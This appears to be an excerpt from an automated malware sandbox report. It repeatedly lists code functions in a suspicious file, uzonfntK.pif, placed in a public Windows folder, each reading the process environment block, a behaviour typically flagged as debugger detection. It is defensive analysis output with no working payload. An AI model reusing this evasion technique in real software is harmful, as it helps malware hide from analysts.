Source: C:\Users\Public\Libraries\uzonfntK.pif; Code function: 3_2_29088D10 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif; Code function: 3_2_29004D1D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif; Code function: 3_2_29058D20 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FC8CD0 mov eax, dword ptr fs:[00000030h]3_2_28FC8CD0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FCCCC8 mov eax, dword ptr fs:[00000030h]3_2_28FCCCC8
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_290A4D30 mov eax, dword ptr fs:[00000030h]3_2_290A4D30
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FF8CB1 mov eax, dword ptr fs:[00000030h]3_2_28FF8CB1
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FF8CB1 mov eax, dword ptr fs:[00000030h]3_2_28FF8CB1
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29068D6B mov eax, dword ptr fs:[00000030h]3_2_29068D6B
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FC8C8D mov eax, dword ptr fs:[00000030h]3_2_28FC8C8D
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29006DA0 mov eax, dword ptr fs:[00000030h]3_2_29006DA0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29098DAE mov eax, dword ptr fs:[00000030h]3_2_29098DAE
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29098DAE mov eax, dword ptr fs:[00000030h]3_2_29098DAE
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_290A4DAD mov eax, dword ptr fs:[00000030h]3_2_290A4DAD
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FDAC50 mov eax, dword ptr fs:[00000030h]3_2_28FDAC50
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FDAC50 mov eax, dword ptr fs:[00000030h]3_2_28FDAC50
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FDAC50 mov eax, dword ptr fs:[00000030h]3_2_28FDAC50
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FDAC50 mov eax, dword ptr fs:[00000030h]3_2_28FDAC50
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FDAC50 mov eax, dword ptr fs:[00000030h]3_2_28FDAC50
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FDAC50 mov eax, dword ptr fs:[00000030h]3_2_28FDAC50
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FD6C50 mov eax, dword ptr fs:[00000030h]3_2_28FD6C50
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FD6C50 mov eax, dword ptr fs:[00000030h]3_2_28FD6C50
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FD6C50 mov eax, dword ptr fs:[00000030h]3_2_28FD6C50
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2900CDB1 mov ecx, dword ptr fs:[00000030h]3_2_2900CDB1
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2900CDB1 mov eax, dword ptr fs:[00000030h]3_2_2900CDB1
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2900CDB1 mov eax, dword ptr fs:[00000030h]3_2_2900CDB1
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29054DD7 mov eax, dword ptr fs:[00000030h]3_2_29054DD7
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29054DD7 mov eax, dword ptr fs:[00000030h]3_2_29054DD7
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FCEC20 mov eax, dword ptr fs:[00000030h]3_2_28FCEC20
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29070DF0 mov eax, dword ptr fs:[00000030h]3_2_29070DF0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29070DF0 mov eax, dword ptr fs:[00000030h]3_2_29070DF0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FE0C00 mov eax, dword ptr fs:[00000030h]3_2_28FE0C00
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FE0C00 mov eax, dword ptr fs:[00000030h]3_2_28FE0C00
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FE0C00 mov eax, dword ptr fs:[00000030h]3_2_28FE0C00
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FE0C00 mov eax, dword ptr fs:[00000030h]3_2_28FE0C00
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2900CC00 mov eax, dword ptr fs:[00000030h]3_2_2900CC00
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FC6DF6 mov eax, dword ptr fs:[00000030h]3_2_28FC6DF6
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29054C0F mov eax, dword ptr fs:[00000030h]3_2_29054C0F
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FFCDF0 mov eax, dword ptr fs:[00000030h]3_2_28FFCDF0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FFCDF0 mov ecx, dword ptr fs:[00000030h]3_2_28FFCDF0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FCCDEA mov eax, dword ptr fs:[00000030h]3_2_28FCCDEA
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FCCDEA mov eax, dword ptr fs:[00000030h]3_2_28FCCDEA
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FDADE0 mov eax, dword ptr fs:[00000030h]3_2_28FDADE0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FDADE0 mov eax, dword ptr fs:[00000030h]3_2_28FDADE0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FDADE0 mov eax, dword ptr fs:[00000030h]3_2_28FDADE0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FDADE0 mov eax, dword ptr fs:[00000030h]3_2_28FDADE0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FDADE0 mov eax, dword ptr fs:[00000030h]3_2_28FDADE0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FDADE0 mov eax, dword ptr fs:[00000030h]3_2_28FDADE0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FF0DE1 mov eax, dword ptr fs:[00000030h]3_2_28FF0DE1
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2906CC20 mov eax, dword ptr fs:[00000030h]3_2_2906CC20
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2906CC20 mov eax, dword ptr fs:[00000030h]3_2_2906CC20
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FFEDD3 mov eax, dword ptr fs:[00000030h]3_2_28FFEDD3
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FFEDD3 mov eax, dword ptr fs:[00000030h]3_2_28FFEDD3
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29074C34 mov eax, dword ptr fs:[00000030h]3_2_29074C34
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29074C34 mov eax, dword ptr fs:[00000030h]3_2_29074C34
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29074C34 mov eax, dword ptr fs:[00000030h]3_2_29074C34
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29074C34 mov eax, dword ptr fs:[00000030h]3_2_29074C34
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29074C34 mov eax, dword ptr fs:[00000030h]3_2_29074C34
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29074C34 mov eax, dword ptr fs:[00000030h]3_2_29074C34
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29074C34 mov ecx, dword ptr fs:[00000030h]3_2_29074C34
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FF8DBF mov eax, dword ptr fs:[00000030h]3_2_28FF8DBF
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FF8DBF mov eax, dword ptr fs:[00000030h]3_2_28FF8DBF
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29004C59 mov eax, dword ptr fs:[00000030h]3_2_29004C59
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FD0D59 mov eax, dword ptr fs:[00000030h]3_2_28FD0D59
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FD0D59 mov eax, dword ptr fs:[00000030h]3_2_28FD0D59
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FD0D59 mov eax, dword ptr fs:[00000030h]3_2_28FD0D59
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FD8D59 mov eax, dword ptr fs:[00000030h]3_2_28FD8D59
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FD8D59 mov eax, dword ptr fs:[00000030h]3_2_28FD8D59
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FD8D59 mov eax, dword ptr fs:[00000030h]3_2_28FD8D59
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FD8D59 mov eax, dword ptr fs:[00000030h]3_2_28FD8D59
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FD8D59 mov eax, dword ptr fs:[00000030h]3_2_28FD8D59
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2904CCA0 mov ecx, dword ptr fs:[00000030h]3_2_2904CCA0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2904CCA0 mov eax, dword ptr fs:[00000030h]3_2_2904CCA0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2904CCA0 mov eax, dword ptr fs:[00000030h]3_2_2904CCA0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2904CCA0 mov eax, dword ptr fs:[00000030h]3_2_2904CCA0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29080CB5 mov eax, dword ptr fs:[00000030h]3_2_29080CB5
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29080CB5 mov eax, dword ptr fs:[00000030h]3_2_29080CB5
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29080CB5 mov eax, dword ptr fs:[00000030h]3_2_29080CB5
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29080CB5 mov eax, dword ptr fs:[00000030h]3_2_29080CB5
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29080CB5 mov eax, dword ptr fs:[00000030h]3_2_29080CB5
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29080CB5 mov eax, dword ptr fs:[00000030h]3_2_29080CB5
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29080CB5 mov eax, dword ptr fs:[00000030h]3_2_29080CB5
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29080CB5 mov eax, dword ptr fs:[00000030h]3_2_29080CB5
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29080CB5 mov eax, dword ptr fs:[00000030h]3_2_29080CB5
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29080CB5 mov eax, dword ptr fs:[00000030h]3_2_29080CB5
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29080CB5 mov eax, dword ptr fs:[00000030h]3_2_29080CB5
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29080CB5 mov eax, dword ptr fs:[00000030h]3_2_29080CB5
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29080CB5 mov eax, dword ptr fs:[00000030h]3_2_29080CB5
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FC6D10 mov eax, dword ptr fs:[00000030h]3_2_28FC6D10
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FC6D10 mov eax, dword ptr fs:[00000030h]3_2_28FC6D10
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FC6D10 mov eax, dword ptr fs:[00000030h]3_2_28FC6D10
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29002CF0 mov eax, dword ptr fs:[00000030h]3_2_29002CF0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29002CF0 mov eax, dword ptr fs:[00000030h]3_2_29002CF0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29002CF0 mov eax, dword ptr fs:[00000030h]3_2_29002CF0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29002CF0 mov eax, dword ptr fs:[00000030h]3_2_29002CF0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FEAD00 mov eax, dword ptr fs:[00000030h]3_2_28FEAD00
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FEAD00 mov eax, dword ptr fs:[00000030h]3_2_28FEAD00
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FEAD00 mov eax, dword ptr fs:[00000030h]3_2_28FEAD00
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29086F00 mov eax, dword ptr fs:[00000030h]3_2_29086F00
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FD6EE0 mov eax, dword ptr fs:[00000030h]3_2_28FD6EE0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FD6EE0 mov eax, dword ptr fs:[00000030h]3_2_28FD6EE0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FD6EE0 mov eax, dword ptr fs:[00000030h]3_2_28FD6EE0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FD6EE0 mov eax, dword ptr fs:[00000030h]3_2_28FD6EE0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2900CF1F mov eax, dword ptr fs:[00000030h]3_2_2900CF1F
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29054F40 mov eax, dword ptr fs:[00000030h]3_2_29054F40
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29054F40 mov eax, dword ptr fs:[00000030h]3_2_29054F40
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29054F40 mov eax, dword ptr fs:[00000030h]3_2_29054F40
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29054F40 mov eax, dword ptr fs:[00000030h]3_2_29054F40
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29074F42 mov eax, dword ptr fs:[00000030h]3_2_29074F42
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2900CF50 mov eax, dword ptr fs:[00000030h]3_2_2900CF50
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29070F50 mov eax, dword ptr fs:[00000030h]3_2_29070F50
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_290A4F68 mov eax, dword ptr fs:[00000030h]3_2_290A4F68
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29072F60 mov eax, dword ptr fs:[00000030h]3_2_29072F60
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29072F60 mov eax, dword ptr fs:[00000030h]3_2_29072F60
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FCAE90 mov eax, dword ptr fs:[00000030h]3_2_28FCAE90
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FCAE90 mov eax, dword ptr fs:[00000030h]3_2_28FCAE90
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FCAE90 mov eax, dword ptr fs:[00000030h]3_2_28FCAE90
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2900CF80 mov eax, dword ptr fs:[00000030h]3_2_2900CF80
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FD6E71 mov eax, dword ptr fs:[00000030h]3_2_28FD6E71
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29002F98 mov eax, dword ptr fs:[00000030h]3_2_29002F98
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29002F98 mov eax, dword ptr fs:[00000030h]3_2_29002F98
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FC8E1D mov eax, dword ptr fs:[00000030h]3_2_28FC8E1D
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_290A4FE7 mov eax, dword ptr fs:[00000030h]3_2_290A4FE7
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29010FF6 mov eax, dword ptr fs:[00000030h]3_2_29010FF6
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29010FF6 mov eax, dword ptr fs:[00000030h]3_2_29010FF6
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29010FF6 mov eax, dword ptr fs:[00000030h]3_2_29010FF6
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29010FF6 mov eax, dword ptr fs:[00000030h]3_2_29010FF6
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29086FF7 mov eax, dword ptr fs:[00000030h]3_2_29086FF7
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FFAE00 mov eax, dword ptr fs:[00000030h]3_2_28FFAE00
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FFAE00 mov eax, dword ptr fs:[00000030h]3_2_28FFAE00
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FFAE00 mov eax, dword ptr fs:[00000030h]3_2_28FFAE00
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FFAE00 mov ecx, dword ptr fs:[00000030h]3_2_28FFAE00
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FFAE00 mov eax, dword ptr fs:[00000030h]3_2_28FFAE00
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FFAE00 mov eax, dword ptr fs:[00000030h]3_2_28FFAE00
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FFAE00 mov eax, dword ptr fs:[00000030h]3_2_28FFAE00
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FFAE00 mov eax, dword ptr fs:[00000030h]3_2_28FFAE00
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FFAE00 mov eax, dword ptr fs:[00000030h]3_2_28FFAE00
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FFAE00 mov eax, dword ptr fs:[00000030h]3_2_28FFAE00
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FCEFD8 mov eax, dword ptr fs:[00000030h]3_2_28FCEFD8
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FCEFD8 mov eax, dword ptr fs:[00000030h]3_2_28FCEFD8
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FCEFD8 mov eax, dword ptr fs:[00000030h]3_2_28FCEFD8
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29066E20 mov eax, dword ptr fs:[00000030h]3_2_29066E20
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29066E20 mov eax, dword ptr fs:[00000030h]3_2_29066E20
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29066E20 mov ecx, dword ptr fs:[00000030h]3_2_29066E20
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FD2FC8 mov eax, dword ptr fs:[00000030h]3_2_28FD2FC8
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FD2FC8 mov eax, dword ptr fs:[00000030h]3_2_28FD2FC8
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FD2FC8 mov eax, dword ptr fs:[00000030h]3_2_28FD2FC8
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FD2FC8 mov eax, dword ptr fs:[00000030h]3_2_28FD2FC8
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_290A2E4F mov eax, dword ptr fs:[00000030h]3_2_290A2E4F
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_290A2E4F mov eax, dword ptr fs:[00000030h]3_2_290A2E4F
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29050E7F mov eax, dword ptr fs:[00000030h]3_2_29050E7F
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29050E7F mov eax, dword ptr fs:[00000030h]3_2_29050E7F
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29050E7F mov eax, dword ptr fs:[00000030h]3_2_29050E7F
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FFAF69 mov eax, dword ptr fs:[00000030h]3_2_28FFAF69
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FFAF69 mov eax, dword ptr fs:[00000030h]3_2_28FFAF69
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29002E9C mov eax, dword ptr fs:[00000030h]3_2_29002E9C
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29002E9C mov ecx, dword ptr fs:[00000030h]3_2_29002E9C
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2905CEA0 mov eax, dword ptr fs:[00000030h]3_2_2905CEA0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2905CEA0 mov eax, dword ptr fs:[00000030h]3_2_2905CEA0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2905CEA0 mov eax, dword ptr fs:[00000030h]3_2_2905CEA0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FCCF50 mov eax, dword ptr fs:[00000030h]3_2_28FCCF50
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FCCF50 mov eax, dword ptr fs:[00000030h]3_2_28FCCF50
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FCCF50 mov eax, dword ptr fs:[00000030h]3_2_28FCCF50
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FCCF50 mov eax, dword ptr fs:[00000030h]3_2_28FCCF50
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FCCF50 mov eax, dword ptr fs:[00000030h]3_2_28FCCF50
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FCCF50 mov eax, dword ptr fs:[00000030h]3_2_28FCCF50
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2906AEB0 mov eax, dword ptr fs:[00000030h]3_2_2906AEB0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2906AEB0 mov eax, dword ptr fs:[00000030h]3_2_2906AEB0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FFEF28 mov eax, dword ptr fs:[00000030h]3_2_28FFEF28
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29086ED0 mov ecx, dword ptr fs:[00000030h]3_2_29086ED0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FD2F12 mov eax, dword ptr fs:[00000030h]3_2_28FD2F12
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29008EF5 mov eax, dword ptr fs:[00000030h]3_2_29008EF5
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2907E10E mov eax, dword ptr fs:[00000030h]3_2_2907E10E
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2907E10E mov ecx, dword ptr fs:[00000030h]3_2_2907E10E
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2907E10E mov eax, dword ptr fs:[00000030h]3_2_2907E10E
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2907E10E mov eax, dword ptr fs:[00000030h]3_2_2907E10E
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2907E10E mov ecx, dword ptr fs:[00000030h]3_2_2907E10E
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2907E10E mov eax, dword ptr fs:[00000030h]3_2_2907E10E
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2907E10E mov eax, dword ptr fs:[00000030h]3_2_2907E10E
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2907E10E mov ecx, dword ptr fs:[00000030h]3_2_2907E10E
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2907E10E mov eax, dword ptr fs:[00000030h]3_2_2907E10E
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2907E10E mov ecx, dword ptr fs:[00000030h]3_2_2907E10E
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FCC0F0 mov eax, dword ptr fs:[00000030h]3_2_28FCC0F0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FD80E9 mov eax, dword ptr fs:[00000030h]3_2_28FD80E9
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29090115 mov eax, dword ptr fs:[00000030h]3_2_29090115
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FCA0E3 mov ecx, dword ptr fs:[00000030h]3_2_28FCA0E3
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2907A118 mov ecx, dword ptr fs:[00000030h]3_2_2907A118
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2907A118 mov eax, dword ptr fs:[00000030h]3_2_2907A118
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2907A118 mov eax, dword ptr fs:[00000030h]3_2_2907A118
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2907A118 mov eax, dword ptr fs:[00000030h]3_2_2907A118
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29000124 mov eax, dword ptr fs:[00000030h]3_2_29000124
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29064144 mov eax, dword ptr fs:[00000030h]3_2_29064144
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29064144 mov eax, dword ptr fs:[00000030h]3_2_29064144
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29064144 mov ecx, dword ptr fs:[00000030h]3_2_29064144
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29064144 mov eax, dword ptr fs:[00000030h]3_2_29064144
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29064144 mov eax, dword ptr fs:[00000030h]3_2_29064144
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FC80A0 mov eax, dword ptr fs:[00000030h]3_2_28FC80A0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29068158 mov eax, dword ptr fs:[00000030h]3_2_29068158
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_290A4164 mov eax, dword ptr fs:[00000030h]3_2_290A4164
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_290A4164 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_28FD208A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_2908C188 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_2908C188 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_29010185 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_29074180 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_29074180 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_28FFC073 mov eax, dword ptr fs:[00000030h]
